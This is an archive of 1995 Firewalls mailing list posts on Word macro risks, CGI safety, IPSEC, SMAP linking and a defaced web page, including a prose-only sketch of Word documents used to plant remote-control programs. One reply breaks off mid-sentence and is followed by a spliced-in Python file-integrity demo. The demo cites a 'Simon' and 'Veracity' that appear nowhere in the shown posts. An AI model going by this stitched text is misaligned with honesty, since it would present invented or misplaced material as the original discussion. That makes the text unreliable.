Mail: PO Box 69, Daw Park, SA 5041 AUSTRALIA

From firewalls-owner Mon Sep 18 02:00:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA08529 for firewalls-outgoing; Mon, 18 Sep 1995 01:47:59 -0700
Received: from po.gis.prc.com (po.gis.prc.com [140.188.128.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA08522 for ; Mon, 18 Sep 1995 01:47:56 -0700
Message-ID:
Date: 18 Sep 1995 04:44:56 U
From: "Gateway Server"
Subject: Undeliverable Mail
X-Mailer: Mail*Link SMTP-MS 3.0.2
Apparently-To:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V4 #533
Sent: Sat, Sep 16, 1995 4:41 AM
To: Harris Tom
On Server: PRC Bellevue NE MS
Date: Mon, Sep 18, 1995 4:44 AM
Reason: Could not be delivered because the destination Microsoft Mail server could not be found.
From firewalls-owner Mon Sep 18 02:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA09311 for firewalls-outgoing; Mon, 18 Sep 1995 02:19:39 -0700
Received: from sophos.demon.co.uk (meriadoc.sophos.com [193.82.145.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA09294 for ; Mon, 18 Sep 1995 02:19:28 -0700
Received: from elbereth.sophos.com (elbereth.sophos.com [193.82.145.10]) by sophos.demon.co.uk (8.6.11/8.6.9) with ESMTP id KAA16296; Mon, 18 Sep 1995 10:22:03 +0100
Received: (from matthew@localhost) by elbereth.sophos.com (8.6.11/8.6.9) id KAA20930; Mon, 18 Sep 1995 10:19:50 +0100
Date: Mon, 18 Sep 1995 10:19:50 +0100
From: Matthew J Brown
Message-Id: <199509180919.KAA20930@elbereth.sophos.com>
To: firewalls@greatcircle.com, mjb@sophos.com, ian@virusbtn.com, jh@sophos.com, benl@mojo.europe.dg.com
Subject: Horrible thought wrt. the Word virus
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Driving home last night, I had a sudden thought of the potential dangers inherent in Microsoft Word, which go far beyond the simple virus the entire world got so worked up about.

Word Basic is not the simple macro language many of us (including myself until very recently) have believed. In fact, I am informed by people I know who have developed in it, a Word Basic program can access ANY function in ANY Windows DLL. This includes just about any Windows system function, and, worryingly, WINSOCK.DLL.

Therefore, all you need to break just about anyone's firewall and internet security is to con somebody into reading a word document of yours. The possibilities are pretty limitless, but one possibility would be to get word to drop a windows executable which acts as a remote-control for that windows system, connecting out through the firewall to a remote site where Mr Bad Guy sits. Or something that looks for local UNIX systems, breaks in through the syslog hole using sendmail, and drops a worm program in them?
Use your imagination.

Word documents should henceforth be treated *EXACTLY* the same as executables; they're nearly as powerful, and their operating environment is damn common.

It's also worrying to think about how many other applications have data files which are practically executables, and capable of calling system functions when loaded. A friend mentioned PowerBuilder, for example; I'm sure there are a *flood* of others.

-Matt, hoping he's being over paranoid, but I don't think so.

From firewalls-owner Mon Sep 18 05:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13305 for firewalls-outgoing; Mon, 18 Sep 1995 05:25:17 -0700
Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA13298 for ; Mon, 18 Sep 1995 05:25:13 -0700
Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id VAA27390; Mon, 18 Sep 1995 21:21:45 +0900
Date: Mon, 18 Sep 1995 21:21:45 +0900
From: Chiaki Ishikawa
Message-Id: <199509181221.VAA27390@gate.personal-media.co.jp>
To: Firewalls@GreatCircle.COM
In-reply-to: <199509151603.JAA08002@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM)
Subject: Re: WWW - http - cgi_scripts
Reply-to: ishikawa@personal-media.co.jp
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

PMC e-mail id: 3987

>Also, consider running your httpd chroot()d so that the CGI
>scripts have to run in this virtual "jail" as well.

I learned from a Japanese BBS that a provider's machine that serves as subscribers' home pages went down because one of the scripts spawned (or forked) itself over and over and again.

Like the original poster, I am also in the position of managing company www pages, and wonder what I should do regarding CGI scripts. Right now, from what I have learned, I am very skeptical of letting anyone put in CGI scripts.
IF and WHEN I and some other competent programmers have time to look over what the various divisions' home page teams hand in, we will put in short and provable CGI scripts. Otherwise, I won't.

I will prepare a simple CGI script for asking for some comment and other often requested functions. But, even for these, I have some doubt as to my skill to produce bug-free scripts. (And I have been using UNIX for close to 15 years...)

Being paranoid, I am running httpd experimentally under a chroot()ed environment and as a NON-root user. Hence the CERN server can't open privileged port number 80.

I wonder if there is a tool to verify the effective uid of running programs.

--
Chiaki Ishikawa
ishikawa@personal-media.co.jp
Personal Media Corp.
Shinagawa, Tokyo, Japan 141

From firewalls-owner Mon Sep 18 06:00:30 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14017 for firewalls-outgoing; Mon, 18 Sep 1995 05:56:15 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14010; Mon, 18 Sep 1995 05:56:12 -0700
Message-Id: <199509181256.FAA14010@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA296228900; Mon, 18 Sep 1995 08:55:00 -0400
Date: Mon, 18 Sep 1995 08:55:00 -0400
From: gary flynn
To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, smith@sctc.com
Subject: Re: Firewall off Mortal Kombat XIV
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Ted Doty
>
> 4. Anonymity can only be prevented with good authentication, which means
> crypto. Fortunately, there's a standards-based approach that looks like it
> will bear fruit, so we don't have to be stuck with vendor foo's proprietary
> crypto solution [don't get me wrong ... I'd LOVE it if everyone rushed out
> and bought up NSC's DPF. Works Great, Lasts A Long Time. But now, back to
> reality].
> This is not a magic bullet, just a tool to prevent anonymity from
> arbitrary Internet locations.
>

What standards based approach are you talking about? Is this the IPSEC work? Doesn't this depend upon IPv6? If not, where can I learn more?

thanks,
Gary Flynn
James Madison University

From firewalls-owner Mon Sep 18 06:02:50 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13769 for firewalls-outgoing; Mon, 18 Sep 1995 05:49:31 -0700
Received: from jet.msk.su (relay1.jet.msk.su [194.87.88.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA13754 for ; Mon, 18 Sep 1995 05:49:07 -0700
Received: by jet.msk.su; Mon, 18 Sep 95 16:47 GMT+4:00
Received: from tiger.jet.msk.su(193.124.4.1) by relay1.jet.msk.su id sma013933; Mon Sep 18 16:47:28 1995
Received: from jet.msk.su by jet.msk.su ; Mon, 18 Sep 95 16:47 GMT+4:00
Received: by jet.msk.su; Mon, 18 Sep 95 16:47 GMT+4:00
Message-Id:
Subject: Re: Figured out why SMAP wouldn't work on BSDI...
To: mikenel@netcom.com (Michael Nelson)
Date: Mon, 18 Sep 1995 16:47:27 +0400 (GMT+0400)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Michael Nelson" at Sep 16, 95 09:56:31 pm
X-Pgp-Key: available on request
Content-Type: text
Content-Length: 898
From: "Andrew V. Kovalev"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael Nelson wrote:
>
>
> Naturally I figure out why SMAP wouldn't chroot on BSDI after I post my
> message here :-).
>
> If SMAP is compiled with the shared libraries, attempting to chroot results
> in an "Operation not permitted" error. I have gotten into the habit of
> modifying Makefiles to make programs compile with the shared libraries.
> This usually results in a dramatically smaller binary (hard disk space is
> a valuable resource here ). It broke things in this case...
>

IMHO linking of security-critical applications (and SMAP is one of them) with shared libraries is pretty unsafe..
It is really easy to break something while fixing another thing. I linked everything running on my firewall static, just in case.

avk
--
--- \/\/\/ Andrew.V.Kovalev@jet.msk.su +7-095-973-4848 office
Security is like defecation - unpleasant, but alternatives are worse.

From firewalls-owner Mon Sep 18 06:20:41 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13504 for firewalls-outgoing; Mon, 18 Sep 1995 05:37:14 -0700
Received: from callisto.lif.icnet.uk (callisto.lif.icnet.uk [143.65.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA13497 for ; Mon, 18 Sep 1995 05:37:01 -0700
From: harley@icrf.icnet.uk
Message-Id: <199509181237.FAA13497@miles.greatcircle.com>
Received: by callisto.lif.icnet.uk; Mon, 18 Sep 1995 13:36:38 +0100
Subject: Re: Horrible thought wrt. the Word virus
To: mjb@sophos.com (Matthew J Brown)
Date: Mon, 18 Sep 1995 13:36:38 +0100 (BST)
Cc: harley@icrf.icnet.uk (David Harley), firewalls@greatcircle.com
In-Reply-To: <199509180919.KAA20930@elbereth.sophos.com> from "Matthew J Brown" at Sep 18, 95 10:19:50 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1435
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> Word Basic is not the simple macro language many of us (including
> myself until very recently) have believed. In fact, I am informed by
> people I know who have developed in it, a Word Basic program can
> access ANY function in ANY Windows DLL. This includes just about any
> Windows system function, and, worryingly, WINSOCK.DLL.
>

Confirmed. "Calls are often made to Windows API ... routines, but they can be made to routines in any DLL that makes routines available for other programs" (Word Developers Kit). Furthermore, although DLLs are not supported on the Mac, Word add-in libraries (.WLL files), which are "a special kind of DLL written specifically for Word" *are*.
See appendix C of the Word Developers Kit.

> Therefore, all you need to break just about anyone's firewall and
> internet security is to con somebody into reading a word document of
> yours.
>

I doubt if it's *that* simple, but the possibility of a WordBASIC programmer subverting compiled MacOS and Windows add-in routines certainly seems to exist.

> Word documents should henceforth be treated *EXACTLY* the same as
> executables; they're nearly as powerful, and their operating
> environment is damn common.
>

Something in that: seems to me we should be thinking about trusted and untrusted documents. I'm thinking in terms of clamping down on automacros and execute-only macros in any application which supports them.

David Harley

From firewalls-owner Mon Sep 18 06:30:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14321 for firewalls-outgoing; Mon, 18 Sep 1995 06:02:32 -0700
Received: from gater4.sematech.org (GATER4.SEMATECH.ORG [192.73.53.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA14314 for ; Mon, 18 Sep 1995 06:02:29 -0700
Received: from thecount.eng.sematech.org by gater4.sematech.org (8.6.12/F-1.9) with ESMTP id IAA09852; Mon, 18 Sep 1995 08:01:14 -0500
Received: from localhost.eng.sematech.org by thecount.eng.sematech.org (8.6.12/I-1.8) with SMTP id IAA03419; Mon, 18 Sep 1995 08:01:14 -0500
Message-Id: <199509181301.IAA03419@thecount.eng.sematech.org>
X-Authentication-Warning: thecount.eng.sematech.org: Host localhost.eng.sematech.org didn't use HELO protocol
To: Rich
cc: webserver-nt@delta.process.com, firewalls@greatcircle.com
Subject: Re: Comments on a hacked server/page
Date: Mon, 18 Sep 1995 08:01:05 -0500
From: "Quentin Fennessy"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message Rich writes
>
>At any rate, the gist of it was his home page was "altered" through a hole in
>the CERN server which ran on the outside. What was altered??
> The prices for
>access to his services!!!!!
>
>How can you protect yourself from "altered" information? I mean what if
> someone had changed his page to load pornographic images or
> slanderous comments? Who is responsible? A tough call I know.
>

Rich-

re: How can you protect yourself from "altered" information?

I suggest cloning Tripwire technology onto your NT system. At the very least you could compile md5 and run that regularly against your data files. If NT has a cron-equivalent you could run an md5 executable from a read-only floppy, comparing data files with their checksums on the same read-only floppy.

Would you share more details on the hole in
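The sealed integrity snapshot Simon describes for Veracity and the scheduled digest check Quentin suggests, shown together as an added example (this is not Rocksoft's, Tripwire's or either poster's code): a manifest of per-file digests is itself protected by an HMAC, so a snapshot file rewritten to match an altered page fails verification. The key, the sample pages and the scenario are constructed for the demo, and SHA-256 is substituted for the md5 the post mentions.

```python
import hashlib
import hmac
import json
import os
import tempfile

# The post suggests md5; SHA-256 is substituted because MD5 is collision-broken.
HASH = "sha256"


def hash_file(path):
    """Hex digest of one file, read in chunks so large pages are fine."""
    h = hashlib.new(HASH)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def walk_tree(root):
    """Map of relative path -> {size, digest} for every regular file under root."""
    entries = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order, independent of the filesystem
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entries[rel] = {"size": os.path.getsize(full), HASH: hash_file(full)}
    return entries


def seal(manifest, key):
    """HMAC over the canonical JSON form of the manifest. This is what makes the
    snapshot 'internally secure': without the key no entry can be rewritten."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, HASH).hexdigest()


def build_snapshot(root, key):
    """Take the baseline once, from a tree known to be good."""
    manifest = walk_tree(root)
    return {"files": manifest, "seal": seal(manifest, key)}


def verify_snapshot(root, snapshot, key):
    """The cron-driven check. Raises ValueError if the snapshot fails its seal;
    otherwise returns the added, removed and changed relative paths."""
    if not hmac.compare_digest(seal(snapshot["files"], key), snapshot["seal"]):
        raise ValueError("snapshot seal does not verify: snapshot altered or wrong key")
    old, new = snapshot["files"], walk_tree(root)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo():
    """Constructed scenario modelled on the incident above: a price page is
    altered, then the stored digest is rewritten to hide the change."""
    # Constructed demo key. Keep the real one, like Quentin's read-only floppy,
    # somewhere the web server itself can neither read nor write.
    key = b"constructed-demo-key-keep-off-the-web-server"
    with tempfile.TemporaryDirectory() as root:
        pages = {  # constructed sample pages
            "index.html": b"<h1>Acme ISP</h1>\n",
            "prices.html": b"Dialup: $20/month\nISDN: $100/month\n",
        }
        for name, body in pages.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(body)
        snap = build_snapshot(root, key)
        clean = verify_snapshot(root, snap, key)

        # The page is altered behind the author's back.
        altered = os.path.join(root, "prices.html")
        with open(altered, "wb") as f:
            f.write(b"Dialup: $45/month\nISDN: $150/month\n")
        after_edit = verify_snapshot(root, snap, key)

        # Someone with write access to the snapshot file, but not the key,
        # rewrites the stored entry to match the altered page.
        forged = json.loads(json.dumps(snap))  # as the admin would reload it from disk
        forged["files"]["prices.html"] = {
            "size": os.path.getsize(altered), HASH: hash_file(altered)}
        try:
            verify_snapshot(root, forged, key)
            tamper_detected = False
        except ValueError:
            tamper_detected = True
    return {"clean": clean, "after_edit": after_edit, "tamper_detected": tamper_detected}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production the baseline is taken from a tree you trust and the key never touches the served host; a seal failure is itself an alert, not a reason to rebuild the snapshot.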